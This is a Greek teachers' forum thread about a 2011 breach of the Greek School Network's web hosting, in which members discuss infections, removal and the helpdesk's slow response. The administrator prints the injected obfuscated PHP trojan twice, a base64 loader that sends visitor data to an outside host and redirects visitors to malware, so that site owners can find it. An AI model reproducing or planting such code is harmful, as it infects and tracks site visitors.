Το Στέκι των Πληροφορικών

Γενικά => Γενικά Παιδαγωγικά, Επιστημονικά και Τεχνικά Θέματα => Ασφάλεια - Εργονομία => Μήνυμα ξεκίνησε από: alkisg στις 14 Απρ 2011, 10:17:03 ΜΜ

Τίτλος: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: alkisg στις 14 Απρ 2011, 10:17:03 ΜΜ
Σήμερα για κάποιες ώρες το φόρουμ είχε παραβιαστεί, πιθανώς λόγω κάποιου κενού ασφαλείας του SMF (http://www.simplemachines.org/).
Το αποτέλεσμα ήταν ότι σε κάθε επίσκεψη ο χρήστης μεταφερόταν για λίγο σε κάποια άλλη σελίδα που είχε το "TrojanDownloader:Java/Exdoer", και ανάλογα με το λειτουργικό, τον browser και το αντιιικό του υπήρχε περίπτωση να κολλήσει.

Επανέφερα το φόρουμ όπως ήταν πριν την παραβίαση, αλλά δεν έχει ακόμα ανακοινωθεί κάποιο κενό ασφαλείας από την εταιρία Simple Machines που αναπτύσσει το λογισμικό SMF του φόρουμ, ούτε έχει βγει κάποια διόρθωση, επομένως δεν υπάρχει εγγύηση ότι αυτό δεν θα ξανασυμβεί.

Έτσι για τις επόμενες μέρες καλό θα είναι οι χρήστες του φόρουμ να είναι προσεκτικοί κατά την επίσκεψή τους.
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: poursali στις 14 Απρ 2011, 10:32:11 ΜΜ
και από ότι είδα ανακαλύφτηκε σήμερα από την microsoft... όσοι νομίζουν ότι έχουν προσβληθεί καλύτερα να περιορίσουν τη χρήση του υπολογιστή μέχρι να έχει ενημερωθεί το αντιικό...
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: dim στις 14 Απρ 2011, 10:37:39 ΜΜ
Παράθεση από: alkisg στις 14 Απρ 2011, 10:17:03 ΜΜ
....
Παράθεση από: poursali στις 14 Απρ 2011, 10:32:11 ΜΜ
καλύτερα να περιορίσουν τη χρήση του υπολογιστή
να είναι προσεκτικοί κατά την επίσκεψή τους.
Τι ακριβώς δηλαδή να κάνουμε?
Πως γίνεται το να είμαι προσεκτική κατά την επίσκεψή μου...    και πως γίνεται να περιορίσω τη χρήση...
Υπάρχει κάποιο χαπάκι....... αντιβίωση ίσως?
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: nikosx στις 14 Απρ 2011, 10:41:12 ΜΜ
εγώ πάντως κόλλησα πολύ πράγμα και ο desktop έχει σχεδόν πεθάνει :(
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: poursali στις 14 Απρ 2011, 10:50:12 ΜΜ
μια λύση είναι αυτή: http://www.bleepingcomputer.com/virus-removal/remove-ms-removal-tool

δεν την έχω ελέγξει μιας και έχω λινουξ

@dim: το λέω πχ για κάποιον που κάνει συναλλαγές μέσω ιντερνετ, web banking κλπ και επίσης για όσους δεν θα ήθελαν να χάσουν κάποιο σημαντικό αρχείο - κυρίως τα δεδομένα μας νοιάζουν πάντα
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: evry στις 14 Απρ 2011, 10:53:00 ΜΜ
http://www.geekpolice.net/t26522-remove-ms-removal-tool-removal-guide (http://www.geekpolice.net/t26522-remove-ms-removal-tool-removal-guide)

το παραπάνω το δοκίμασα γιατί κόλλησε ο ένας υπολογιστής και είναι οκ.

με το linux δεν υπάρχει πρόβλημα
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: pgrontas στις 14 Απρ 2011, 11:43:26 ΜΜ
Παράθεση από: poursali στις 14 Απρ 2011, 10:32:11 ΜΜ
και από ότι είδα ανακαλύφτηκε σήμερα από την microsoft... όσοι νομίζουν ότι έχουν προσβληθεί καλύτερα να περιορίσουν τη χρήση του υπολογιστή μέχρι να έχει ενημερωθεί το αντιικό...
Πάντως σε μένα το Microsoft Security Essentials το μπλόκαρε εξαρχής και δεν φαίνεται να έχω κολλήσει τίποτα.
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: poursali στις 14 Απρ 2011, 11:58:38 ΜΜ
Παράθεση από: pgrontas στις 14 Απρ 2011, 11:43:26 ΜΜ
Πάντως σε μένα το Microsoft Security Essentials το μπλόκαρε εξαρχής και δεν φαίνεται να έχω κολλήσει τίποτα.

ίσως είχε προλάβει το δικό σου να ενημερωθεί :)
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: petrosp13 στις 15 Απρ 2011, 12:06:22 ΠΜ
Δημιούργησε χοντρό πρόβλημα αυτό που κατέβαινε από την σελίδα, αλλά το επανέφερα σε safe mode
Δεν άφηνε κανένα πρόγραμμα να ανοίξει, δεν άφηνε το CTRL+ALT+DEL, έκλεισε ακόμα και τα υπάρχοντα προγράμματα
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: tom στις 15 Απρ 2011, 12:51:29 ΠΜ
Εμένα το AVG Internet Security "ξηγήθηκε"  :) .
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: amichail στις 15 Απρ 2011, 02:05:55 ΠΜ
Και εμένα το έπιασε το avast antivirus. Αλλά είχε όλο το sch.gr πρόβλημα, δεν έμπαινε ούτε στο webmail ούτε πουθενά. Ούτε και σε πολλές άλλες σελίδες.
Αφού για μια στιγμή σκέφτηκα μήπως ήταν false positive.
Μετά άλλαξα σε Ubuntu, έψαξα ανενόχλητη πλέον στο google και είδα ότι έχει κάνει μεγάλη ζημιά ... άρχισε κατά κύματα και ήταν πλέον σε μορφή χιονοστιβάδας.
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: geokra στις 15 Απρ 2011, 07:51:19 ΠΜ
Παράθεση από: poursali στις 14 Απρ 2011, 10:50:12 ΜΜ
μια λύση είναι αυτή: http://www.bleepingcomputer.com/virus-removal/remove-ms-removal-tool

δεν την έχω ελέγξει μιας και έχω λινουξ

@dim: το λέω πχ για κάποιον που κάνει συναλλαγές μέσω ιντερνετ, web banking κλπ και επίσης για όσους δεν θα ήθελαν να χάσουν κάποιο σημαντικό αρχείο - κυρίως τα δεδομένα μας νοιάζουν πάντα
Και γω το ίδιο κόλλησα, αλλά είναι και λίγο επίμονο το άτιμο, δεν βγαίνει και εύκολα.
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: Λάμπρος Μπουκουβάλας στις 15 Απρ 2011, 04:42:09 ΜΜ
εγώ δεν αντιμετώπισα κανένα πρόβλημα.
πρέπει να το παραδεχθείτε, έχω τον καλύτερο και ασφαλέστερο υπολογιστή του κόσμου!  ;D
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: alkisg στις 26 Απρ 2011, 10:44:13 ΠΜ
Χρόνια πολλά σε όλους.

Τελικά το κενό ασφαλείας δεν ήταν στο φόρουμ (SMF) αλλά κάπου πιο κεντρικά στο ΠΣΔ, είτε στον apache, είτε, χειρότερα ακόμα, με τοπική πρόσβαση στο file system του web server. Συγκεκριμένα φαίνεται να προσέβαλε μαζικά πολλούς ιστοχώρους χρηστών του ΠΣΔ, γράφοντας σε όσα αρχεία .php μπορούσε, δηλαδή σε αυτά που είχαν write access στο "others (http://en.wikipedia.org/wiki/Filesystem_permissions#Traditional_Unix_permissions)".
Ο trojan έμπαινε στην αρχή αυτών των αρχείων php, με την παρακάτω κρυπτογραφημένη μορφή:
Κώδικας (php) [Επιλογή]

<?php
eval(base64_decode('Z2xvYmFsICRyZXNwb25zZV9zZXNzaW9uczsNCg0KaWYoISRyZXNwb25zZV9zZXNzaW9ucykgew0KCSRyZXNwb25zZV9zZXNzaW9ucyA9ICJhbGl2ZSI7DQoNCgkkcz1iYXNlNjRfZW5jb2RlKHN0cnJldihiYXNlNjRfZW5jb2RlKHN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnUkVNT1RFX0FERFInXSkuJ3wnLnN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnSFRUUF9BQ0NFUFQnXSkuJ3wnLnN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKSkpOw0KCSR1PSdodHRwOi8vbWRteXNzZC5jei5jYy94cC9zZXNzaW9uLnBocCc7DQoJJHM9QGZpbGVfZ2V0X2NvbnRlbnRzKCIkdT90PSRzIik7DQoNCglpZihjb3VudCgkaHR0cF9yZXNwb25zZV9oZWFkZXIpKSB7DQoJCSRyZWxvYyA9ICcnOw0KCQlmb3JlYWNoKCRodHRwX3Jlc3BvbnNlX2hlYWRlciBhcyAkdikgew0KCQkJJHQ9ZXhwbG9kZSgiOiAiLCR2KTsNCgkJCWlmKHN0cnRvbG93ZXIodHJpbSgkdFswXSkpPT0ibG9jYXRpb24iKSB7DQoJCQkJJHJlbG9jID0gdHJpbSgkdFsxXSk7DQoJCQl9DQoJCX0NCgkJaWYoJHJlbG9jICYmICFzdHJsZW4oc3RycG9zKCRyZWxvYywnMDAwMDEwMjAnKSkpIHsNCgkJCWlmKCFAaGVhZGVyc19zZW50KCkpIHsNCgkJCQlAaGVhZGVyKCJIVFRQLzEuMSAzMDIgRm91bmQiKTsNCgkJCQlAaGVhZGVyKCJWYXJ5OiBBY2NlcHQtRW5jb2RpbmcsVXNlci1BZ2VudCIpOw0KCQkJCUBoZWFkZXIoIkxvY2F0aW9uOiAkcmVsb2MiKTsNCgkJCX0gZWxzZSB7DQoJCQkJZWNobyAiPGgzPlBhZ2UgTW92ZWQ8L2gzPlRoZSBwYWdlIHlvdSBhcmUgdHJ5aW5nIHRvIG9wZW4gaGFzIGJlZW4gbW92ZWQuPGJyPjxicj5Vc2UgdGhlIG5hdmlnYXRpb24gbGlua3Mgb24gdGhlIHJpZ2h0IG9mIHRoaXMgcGFnZSwgdGhlIHNlYXJjaCBib3ggYXQgdGhlIHRvcCwgb3IgdGhlIHNpdGUgbWFwIGxpbmsgYmVsb3cgdG8gZmluZCB0aGUgbmV3IGxvY2F0aW9uIG9mIHRoZSBwYWdlIHlvdSdyZSBzZWVraW5nLjxicj48YnI+Q2xpY2sgdGhlIGxpbmsgYmVsb3cgdG8gZm9sbG93IG5ldyB1cmwuPGJyPjxicj48YSBocmVmPVwiIi4kdS4iXCI+Ii4kdS4iPC9hPiI7DQoJCQkJZWNobyAic2NyaXB0IHR5cGU9XCJ0ZXh0L2phdmFzY3JpcHRcIj5kb2N1bWVudC5sb2NhdGlvbiA9IFwiIi4kdS4iXCI7PC9zY3JpcHQ+IjsNCgkJCX0NCgkJCWV4aXQ7DQoJCX0NCgl9DQp9'));?>
<?php και εδώ συνεχίζει το αρχικό αρχείο...


Αν έχετε ιστοχώρο στο ΠΣΔ με php αρχεία, αν θέλετε ρίξτε μια ματιά να δείτε αν κάποια από αυτά τροποποιήθηκαν στις 13/4, κι αν ναι, ελέξτε ότι δεν ξεκινάνε με την παραπάνω γραμμή.

Είχα αναφέρει το πρόβλημα στο helpdesk.sch.gr και τους πρότεινα να κάνουν μια κεντρική ανακοίνωση για να ενημερώσουν όλους τους εκπαιδευτικούς για το πρόβλημα, ώστε τουλάχιστον όσοι κόλλησαν να αφαιρέσουν τον ιό. Σήμερα μου απάντησαν ότι είναι ενήμεροι και έκλεισαν το σχετικό δελτίο.
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: new2011 στις 28 Απρ 2011, 10:19:38 ΜΜ
Καλησπέρα,
Το web site του Π. Τσιωτάκη βγάζει  το εξής μήνυμα :

Προειδοποίηση- η επίσκεψη σε αυτόν τον ιστότοπο μπορεί να προκαλέσει ζημία στον υπολογιστή σας!

Τι συμβαίνει ????
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: alkisg στις 28 Απρ 2011, 10:30:00 ΜΜ
Μάλλον αυτό: https://alkisg.mysch.gr/steki/index.php?topic=3846.msg40550#msg40550

Πρέπει επιτέλους να πάρουν κεντρικά μέτρα από το ΠΣΔ, έχει 15 μέρες πια η ιστορία με την παραβίαση ασφαλείας του και ούτε έλυσαν το πρόβλημα, ούτε ανακοίνωση δεν έκαναν ακόμα...
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: P.Tsiotakis στις 28 Απρ 2011, 11:22:09 ΜΜ
το βγάζει σε πολλούς ιστότοπους του ΠΣΔ, συνάδελφε
και στο στέκι κάθε φορά που το επισκέπτομαι

περιμένω τη  επαναφορά και γω...κάποια στιγμή είδα τα αρχεία αλλά όχι τη βάση δεδομένων
ίδωμεν
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: alkisg στις 29 Απρ 2011, 12:38:47 ΠΜ
Παναγιώτη από το στέκι έχω αφαιρέσει μόνος μου τον trojan, ενώ στο site σου παραμένει.
Καλύτερα θα είναι να τον βγάλεις κι εσύ, γιατί από το ΠΣΔ μπορεί να αργήσουν...

Στέκι, όλα καλά:
Κώδικας [Επιλογή]

$ wget -q https://alkisg.mysch.gr/steki/ -O -

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="stylesheet" type="text/css" href="https://alkisg.mysch.gr/steki/Themes/default/css/index.css?rc5" />
...κτλ κτλ


Site σου, μολυσμένο:
Κώδικας [Επιλογή]

$ wget -q http://users.sch.gr/ptsiotakis/ -O -

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Security report #1186 / 2011-04-28</title>
</head>
<frameset rows="*,20">
<frame src="http://nimelts.cz(bad).cc/downloads/">
<frame src="http://nimelts.cz(bad).cc/xp/index.php?tp=3fb41d99137405e1" noresize scrolling="no">

</frameset>
</html>


Το (bad) το έβαλα επίτηδες για να μην πάει κάποιος κατά λάθος εκεί και κολλήσει.
Μπες με ftp στο site σου και δες ποιο .php αρχείο έχει αλλαχθεί στις 13/4...
Btw ο injected php κώδικας έχει κάποιον έλεγχο και κάνει redirect στο cz.cc μόνο μερικές φορές, όχι πάντα, οπότε το wget μπορεί να μην δείχνει πάντα το ανεπιθύμητο url.


Το προειδοποιητικό μήνυμα που βγάζουν οι browsers είναι άλλο θέμα, αφορά γενικά το users.sch.gr/* λόγω των συχνών εμφανίσεων του trojan σε αρκετούς χρήστες (υποφακέλους). Οπότε θα συνεχίσει να εμφανίζεται μέχρι το ΠΣΔ να καθαρίσει εντελώς και να βγει από την blacklist. Στο μεταξύ όμως καλό είναι τουλάχιστον εμείς οι Πληροφορικοί που έχουμε την τεχνογνωσία, να αφαιρέσουμε τον trojan από τις σελίδες μας, για να μην κολλάμε τους επισκέπτες...
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: pfan στις 29 Απρ 2011, 06:05:18 ΠΜ
Επειδή είχα πρόβλημα και στο δικό μου σχολείο καθάρισα (με τη βοήθεια του Άλκη) τις σελίδες και άνοιξα ένα δελτίο στο helpdesk.sch.gr για να αναφέρω το πρόβλημα και ότι παρατηρείται και σε άλλα σχολεία. Η απάντηση που πήρα ήταν ότι πρέπει να δηλώσω σε ποια σχολεία υπάρχει το πρόβλημα. Οπότε καλό είναι όσοι έχουν το πρόβλημα να ανοίξουν ένα δελτίο στο helpdesk.

@Άλκη μήπως το θέμα αυτό να φύγει από την ΑΕΠΠ

(Χρόνια πολλά σε όλους!!!)
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: Λάμπρος Μπουκουβάλας στις 29 Απρ 2011, 08:38:04 ΜΜ
Είχα κι εγώ πρόβλημα στο http://users.sch.gr/lambrosbouk
Έστειλα ένα τεχνικό δελτίο μέσα στη Μεγάλη Εβδομάδα και ο Θοδωρής Μπρότσης από το παν. Θεσσαλίας μου έλυσε το πρόβλημα την επόμενη μέρα.
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: alkisg στις 29 Απρ 2011, 09:10:13 ΜΜ
Λάμπρο μου εφόσον είχαν τρύπα ασφαλείας στο web hosting τους και γέμισε ο σκληρός τους δίσκος με τον trojan, ας κάνουν μια μαζική εύρεση και διαγραφή του κώδικά του και να τον διώξουν σε 2 λεπτά.
Δεν χρειάζεται να περιμένουν τον κάθε χρήστη του ΠΣΔ που έχει αρχεία .php να καταλάβει ότι έχει κολλήσει trojan και να το αναφέρει στο helpdesk. Η πλειονότητα των χρηστών του ΠΣΔ δεν είναι Πληροφορικοί και δεν είναι σίγουρο ότι θα καταλάβουν και θα αναφέρουν το πρόβλημα. Μάλιστα και αρκετοί Πληροφορικοί μπορεί να μην καταλάβουν ότι φταίει το site τους, ή να περιμένουν να διορθωθεί από μόνο του.

Αν δεν λάβουν κεντρικά μέτρα το καθάρισμα θα διαρκέσει μήνες, και στο μεταξύ το users.sch.gr ήδη έχει μπει σε blacklist και μας επηρεάζει όλους.

Προσωπικά όμως σημαντικότερο λάθος τους θεωρώ το ότι δεν βγήκαν να παραδεχτούν την παραβίαση ασφαλείας, και να ειδοποιήσουν τους χρήστες ότι όλα τα δεδομένα τους μπορεί να έχουν πέσει σε ξένα χέρια. Κάποιος ξένος είχε πρόσβαση σε όλο το file system του server. Είναι σοβαρά πράγματα αυτά, θα έπρεπε να είχαν λυθεί από την πρώτη μέρα, όχι να συζητάμε για τα αυτονόητα 15 μέρες μετά.
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: P.Tsiotakis στις 29 Απρ 2011, 09:35:48 ΜΜ
στατική html και το κεφάλι μας ήσυχο
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: Λάμπρος Μπουκουβάλας στις 30 Απρ 2011, 03:25:45 ΜΜ
Άλκη, συμφωνώ με όσα γράφεις.

Μου ήρθε το παρακάτω mail στις 22/4:

Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: pmouz στις 01 Μαΐου 2011, 12:21:12 ΜΜ
Παράθεση από: alkisg στις 26 Απρ 2011, 10:44:13 ΠΜ
Χρόνια πολλά σε όλους.

Τελικά το κενό ασφαλείας δεν ήταν στο φόρουμ (SMF) αλλά κάπου πιο κεντρικά στο ΠΣΔ, είτε στον apache, είτε, χειρότερα ακόμα, με τοπική πρόσβαση στο file system του web server. Συγκεκριμένα φαίνεται να προσέβαλε μαζικά πολλούς ιστοχώρους χρηστών του ΠΣΔ, γράφοντας σε όσα αρχεία .php μπορούσε, δηλαδή σε αυτά που είχαν write access στο "others (http://en.wikipedia.org/wiki/Filesystem_permissions#Traditional_Unix_permissions)".
Ο trojan έμπαινε στην αρχή αυτών των αρχείων php, με την παρακάτω κρυπτογραφημένη μορφή:
Κώδικας (php) [Επιλογή]

<?php
eval(base64_decode('Z2xvYmFsICRyZXNwb25zZV9zZXNzaW9uczsNCg0KaWYoISRyZXNwb25zZV9zZXNzaW9ucykgew0KCSRyZXNwb25zZV9zZXNzaW9ucyA9ICJhbGl2ZSI7DQoNCgkkcz1iYXNlNjRfZW5jb2RlKHN0cnJldihiYXNlNjRfZW5jb2RlKHN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnUkVNT1RFX0FERFInXSkuJ3wnLnN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnSFRUUF9BQ0NFUFQnXSkuJ3wnLnN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKSkpOw0KCSR1PSdodHRwOi8vbWRteXNzZC5jei5jYy94cC9zZXNzaW9uLnBocCc7DQoJJHM9QGZpbGVfZ2V0X2NvbnRlbnRzKCIkdT90PSRzIik7DQoNCglpZihjb3VudCgkaHR0cF9yZXNwb25zZV9oZWFkZXIpKSB7DQoJCSRyZWxvYyA9ICcnOw0KCQlmb3JlYWNoKCRodHRwX3Jlc3BvbnNlX2hlYWRlciBhcyAkdikgew0KCQkJJHQ9ZXhwbG9kZSgiOiAiLCR2KTsNCgkJCWlmKHN0cnRvbG93ZXIodHJpbSgkdFswXSkpPT0ibG9jYXRpb24iKSB7DQoJCQkJJHJlbG9jID0gdHJpbSgkdFsxXSk7DQoJCQl9DQoJCX0NCgkJaWYoJHJlbG9jICYmICFzdHJsZW4oc3RycG9zKCRyZWxvYywnMDAwMDEwMjAnKSkpIHsNCgkJCWlmKCFAaGVhZGVyc19zZW50KCkpIHsNCgkJCQlAaGVhZGVyKCJIVFRQLzEuMSAzMDIgRm91bmQiKTsNCgkJCQlAaGVhZGVyKCJWYXJ5OiBBY2NlcHQtRW5jb2RpbmcsVXNlci1BZ2VudCIpOw0KCQkJCUBoZWFkZXIoIkxvY2F0aW9uOiAkcmVsb2MiKTsNCgkJCX0gZWxzZSB7DQoJCQkJZWNobyAiPGgzPlBhZ2UgTW92ZWQ8L2gzPlRoZSBwYWdlIHlvdSBhcmUgdHJ5aW5nIHRvIG9wZW4gaGFzIGJlZW4gbW92ZWQuPGJyPjxicj5Vc2UgdGhlIG5hdmlnYXRpb24gbGlua3Mgb24gdGhlIHJpZ2h0IG9mIHRoaXMgcGFnZSwgdGhlIHNlYXJjaCBib3ggYXQgdGhlIHRvcCwgb3IgdGhlIHNpdGUgbWFwIGxpbmsgYmVsb3cgdG8gZmluZCB0aGUgbmV3IGxvY2F0aW9uIG9mIHRoZSBwYWdlIHlvdSdyZSBzZWVraW5nLjxicj48YnI+Q2xpY2sgdGhlIGxpbmsgYmVsb3cgdG8gZm9sbG93IG5ldyB1cmwuPGJyPjxicj48YSBocmVmPVwiIi4kdS4iXCI+Ii4kdS4iPC9hPiI7DQoJCQkJZWNobyAic2NyaXB0IHR5cGU9XCJ0ZXh0L2phdmFzY3JpcHRcIj5kb2N1bWVudC5sb2NhdGlvbiA9IFwiIi4kdS4iXCI7PC9zY3JpcHQ+IjsNCgkJCX0NCgkJCWV4aXQ7DQoJCX0NCgl9DQp9'));?>
<?php και εδώ συνεχίζει το αρχικό αρχείο...


Αν έχετε ιστοχώρο στο ΠΣΔ με php αρχεία, αν θέλετε ρίξτε μια ματιά να δείτε αν κάποια από αυτά τροποποιήθηκαν στις 13/4, κι αν ναι, ελέξτε ότι δεν ξεκινάνε με την παραπάνω γραμμή.

Είχα αναφέρει το πρόβλημα στο helpdesk.sch.gr και τους πρότεινα να κάνουν μια κεντρική ανακοίνωση για να ενημερώσουν όλους τους εκπαιδευτικούς για το πρόβλημα, ώστε τουλάχιστον όσοι κόλλησαν να αφαιρέσουν τον ιό. Σήμερα μου απάντησαν ότι είναι ενήμεροι και έκλεισαν το σχετικό δελτίο.

Και στην προσωπική μου ιστοσελίδα στο sch  είχε πάει στο configuration.php και είχε βάλει το eval(...) στην αρχή του αρχείου με αποτέλεσμα να φορτώνει κάποια άλλη ιστοσελίδα. Όποιος το έκανε να του καεί ο υπολογιστής...
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: Keep Growing στις 02 Μαΐου 2011, 05:00:09 ΜΜ
"...maintenance downtime or capacity problems", με την υπομονή και τα νεύρα μας.

Γιατί δε λένε: "joomla και wordpress (php γενικά) απαγορεύονται στο ΠΣΔ", ώστε και μεις να βρούμε την υγειά μας αλλά και το "ψηφιακό σχολείο" να χτιστεί από primitive programmers.  :-\
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: amichail στις 04 Μαΐου 2011, 01:32:36 ΠΜ
Λυπάμαι που το λέω, αλλά τόσες μέρες μετά τον ιό, εξακολουθεί να μου βγάζει προειδοποίηση για ορισμένα θέματα στο ΣΤΕΚΙ.
Κοινό χαρακτηριστικό τους έχουν ότι σε όλα περιλαμβάνεται ανάρτηση του κου Τσιωτάκη.
Απ΄όσο μπορώ να δω, σε όσα δεν έχει καταθέσει ακόμα την (πολύτιμη) άποψη του δεν μου βγάζει προειδοποίηση.
Παίζει κάτι με το προφίλ π.χ.; έχει σύνδεση με το site που ειρήσθω εν παρόδω δυστυχώς βγάζει ακόμα και αυτό το ίδιο μήνυμα;
ρωτάω εγώ η άσχετη  ???

το μήνυμα εν τω μεταξύ λέει γενικά για το users.sch.gr

Κε Τσιωτάκη, η επαναφορά που περιμένατε έγινε ή μάλλον ακόμα; Να πιέσουμε κι εμείς το helpdesk;

Μήπως έχω εγώ το πρόβλημα;
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: P.Tsiotakis στις 04 Μαΐου 2011, 09:21:30 ΠΜ
εμένα και στο στέκι μου βγάζει μήνυμα για "κακόβουλο σιτε" κάθε φορά που το επισκέπτομαι (πατώ συνέχεια και εισέρχομαι)
από τη δική μου ιστοσελίδα "κατέβασα" το wordpress (php κομμάτι) και είναι όλες στατικές html σελίδες

φυσικά, μπορείς να στείλεις μήνυμα και συ στο helpdesk...

Παναγιώτης
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: alkisg στις 04 Μαΐου 2011, 09:53:44 ΠΜ
Απ' όσο έχω καταλάβει, από την υπηρεσία safebrowsing του google ο ιστοχώρος http://users.sch.gr/ptsiotakis θεωρείται κακόβουλος και γι' αυτό μπλοκάρει όποιες σελίδες έχουν παραπομπή σε αυτόν:
http://www.google.com/safebrowsing/diagnostic?site=users.sch.gr/ptsiotakis

Ο δικός μου καθώς και το στέκι δεν χαρακτηρίστηκαν ως κακόβουλοι, πιθανώς επειδή έβγαλα άμεσα τον trojan:
http://www.google.com/safebrowsing/diagnostic?site=alkisg.mysch.gr
http://www.google.com/safebrowsing/diagnostic?site=alkisg.mysch.gr/steki

Αυτή η υπηρεσία safebrowsing χρησιμοποιείται και από τον Firefox και από τον Google chrome:
http://www.google.com/tools/firefox/safebrowsing/

Για να σταματήσει κάποιος ιστοχώρος να θεωρείται κακόβουλος, η google λέει ότι πρέπει να γίνει:
Παράθεση από: http://www.google.gr/webmasters/docs/faq.html
Αίτηση επανεξέτασης ιστοτόπου για κακόβουλο λογισμικό

Αφού ελέγξετε τον ιστότοπό σας και βεβαιωθείτε ότι είναι καθαρός, μπορείτε να υποβάλετε αίτημα προς επανεξέταση. Λάβετε υπόψη ότι θα χρειαστεί να επαληθεύσετε την κατοχή του ιστότοπου για να μπορέσετε να ζητήσετε να γίνει εξέτασή του.
...


Οπότε Παναγιώτη θα πρότεινα (1) να κάνεις τα παραπάνω που λέει η google για να σταματήσει το site σου να θεωρείται κακόβουλο, (2) να βγάλεις για λίγες μέρες το website σου από το προφίλ σου ώστε να μην υπάρχουν links από το στέκι στο site σου ώστε εν τέλει να μην βγαίνουν προειδοποιήσεις στα άλλα μέλη (και μετά από λίγες μέρες το ξαναβάζεις), και (3) και βασικότερο, να τα ψάλλεις στο helpdesk γιατί προφανώς θα έπρεπε να είχαν βγάλει τον trojan από την πρώτη μέρα και όχι να τον έχουν και να τον θρέφουνε ακόμα και να μας παιδεύουν όλους...  ;D


Εγώ απορώ γιατί δεν βγήκαν ακόμα να παραδεχτούν ότι υπήρξε (και ακόμα υπάρχει) παραβίαση ασφαλείας του server και να ενημερώσουν τους χρήστες του ΠΣΔ ότι τα δεδομένα τους μπορεί να έχουν κλαπεί, οπότε τουλάχιστον να αλλάξουμε κωδικούς, ενώ αν είχαμε online ευαίσθητα δεδομένα όπως πληροφορίες για web banking ή πιστωτικές να λάβουμε τα μέτρα μας, κτλ κτλ... μου φαίνεται εντελώς απαράδεκτος ο χειρισμός του γεγονότος.
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: P.Tsiotakis στις 04 Μαΐου 2011, 10:14:51 ΠΜ
έκανα τα 1 και 2

δεν είχα ασχοληθεί με τη google, καθώς ο τελευταίος έλεγχος ήταν στις 21/4 και θεωρούσα ότι θα κάνει έλεγχο ξανά!!
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: Λάμπρος Μπουκουβάλας στις 04 Μαΐου 2011, 01:14:10 ΜΜ
πάντως εγώ ΔΕΝ είχα κανένα πρόβλημα με το στέκι, ούτε με τη σελίδα του Παναγιώτη, μετά τις διορθώσεις που έγιναν τη Μ. Εβδομάδα. το μόνο που βαρέθηκα να βλέπω στην οθόνη μου, είναι το γνωστό "proxy error"...
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: P.Tsiotakis στις 04 Μαΐου 2011, 07:46:31 ΜΜ
νομίζω πως όλα είναι εντάξει τώρα
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: alkisg στις 04 Μαΐου 2011, 09:26:28 ΜΜ
ΟΚ, συγχώνευσα το θέμα με το "κεντρικό" περί της παραβίασης ασφαλείας του ΠΣΔ.
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: Gnirut στις 05 Μαΐου 2011, 10:49:57 ΠΜ
Παράθεση από: alkisg στις 04 Μαΐου 2011, 09:26:28 ΜΜ
